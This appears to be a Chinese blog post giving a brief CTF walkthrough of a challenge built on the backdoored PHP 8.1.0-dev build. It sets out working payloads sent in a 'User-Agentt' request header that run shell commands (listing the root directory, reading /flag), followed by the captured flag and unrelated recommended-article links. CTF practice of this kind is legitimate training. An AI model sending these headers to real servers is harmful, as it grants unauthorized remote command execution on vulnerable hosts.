青少年CTF练习平台 PHP的后门

马船长2025-01-25 0:35

题目

根据提示,PHP/8.1.0-dev漏洞,修改请求头利用此漏洞

注意 zerodium后面拼接函数发送

html 复制代码 
User-Agentt:zerodiumsystem("ls /");

读取flag

html 复制代码 
User-Agentt: zerodiumsystem("cat /flag");

拿下flag

flag{d514c824035b427da2d1c14edb5ae098}

相关推荐
房开民3 小时前
c++总结
java·开发语言·c++
毕设源码-赖学姐3 小时前
【开题答辩全过程】以 基于Java的医院器材管理系统的设计与实现为例,包含答辩的问题和答案
java·开发语言
float_com3 小时前
【java常用API】----- Arrays
java·开发语言
不会写DN4 小时前
PHP 中的文件读写与上传
android·开发语言·php
LuckyTHP4 小时前
迁移shibboleth java获取shibboleth用户信息
java·开发语言
客卿1234 小时前
数论===质数统计(暴力法,)
java·开发语言
Σίσυφος19005 小时前
C++ 多肽经典面试题
开发语言·c++·面试
csdn_aspnet5 小时前
C# 求n边凸多边形的对角线数量(Find number of diagonals in n sided convex polygon)
开发语言·算法·c#
qq_254674415 小时前
Docker 中的 镜像(
开发语言
码云社区6 小时前
JAVA二手车交易二手车市场系统源码支持微信小程序+微信公众号+H5+APP
java·开发语言·微信小程序·二手交易·闲置回收
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)06Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程07OpenClaw 使用和管理 MCP 完全指南08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)10UV安装并设置国内源